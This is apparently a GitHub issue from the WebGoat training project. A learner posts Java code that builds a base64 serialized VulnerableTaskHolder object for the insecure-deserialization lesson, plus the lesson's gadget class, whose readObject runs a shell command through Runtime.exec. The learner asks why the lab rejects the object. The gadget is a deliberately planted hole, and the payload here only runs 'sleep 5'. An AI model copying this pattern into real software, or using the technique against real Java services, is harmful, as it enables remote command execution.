You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The task is not executable between now and the next ten minutes, so the action will be ignored. Maybe you copied an old solution? Let's try again.
#1637
I'm running Webgoat on my virtual machine and already synchronizing the time of the virtual server with the time of my host machine. But I keep receiving the message saying "The task is not executable between now and the next ten minutes, so the action will be ignored. Maybe you copied an old solution? Let's try again."
This is my Main.java:
import java.io.*;
import java.util.*;
import java.time.*;
import org.dummy.insecure.framework.VulnerableTaskHolder;
public class Main{
public static void main(String[] args) throws FileNotFoundException,IOException,ClassNotFoundException{
VulnerableTaskHolder go = new VulnerableTaskHolder("penguin", "sleep 5");
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(go);
oos.flush();
System.out.println(Base64.getEncoder().encodeToString(bos.toByteArray()));
}
}
This is VulnerableTaskHolder.java:
package org.dummy.insecure.framework;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.time.LocalDateTime;
import java.time.Instant;
//import lombok.extern.slf4j.Slf4j;
//@Slf4j
// TODO move back to lesson
public class VulnerableTaskHolder implements Serializable {
private static final long serialVersionUID = 2;
private String taskName;
private String taskAction;
private LocalDateTime requestedExecutionTime;
public VulnerableTaskHolder(String taskName, String taskAction) {
super();
this.taskName = taskName;
this.taskAction = taskAction;
this.requestedExecutionTime = LocalDateTime.now().plusSeconds(2);
}
@Override
public String toString() {
return "VulnerableTaskHolder [taskName="
+ taskName
+ ", taskAction="
+ taskAction
+ ", requestedExecutionTime="
+ requestedExecutionTime
+ "]";
}
/**
* Execute a task when de-serializing a saved or received object.
*
* @author stupid develop
*/
private void readObject(ObjectInputStream stream) throws Exception {
// unserialize data so taskName and taskAction are available
stream.defaultReadObject();
// do something with the data
//log.info("restoring task: {}", taskName);
//log.info("restoring time: {}", requestedExecutionTime);
if (requestedExecutionTime != null
&& (requestedExecutionTime.isBefore(LocalDateTime.now())
|| requestedExecutionTime.isAfter(LocalDateTime.now()))) {
// do nothing is the time is not within 10 minutes after the object has been created
//log.debug(this.toString());
throw new IllegalArgumentException("outdated");
}
// condition is here to prevent you from destroying the goat altogether
if ((taskAction.startsWith("sleep") || taskAction.startsWith("ping"))
&& taskAction.length() < 22) {
//log.info("about to execute: {}", taskAction);
try {
Process p = Runtime.getRuntime().exec(taskAction);
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
while ((line = in.readLine()) != null) {
//log.info(line);
}
} catch (IOException e) {
//log.error("IO Exception", e);
}
}
}
}
The text was updated successfully, but these errors were encountered:
I'm running Webgoat on my virtual machine and already synchronizing the time of the virtual server with the time of my host machine. But I keep receiving the message saying "The task is not executable between now and the next ten minutes, so the action will be ignored. Maybe you copied an old solution? Let's try again."
This is my Main.java:
This is VulnerableTaskHolder.java:
The text was updated successfully, but these errors were encountered: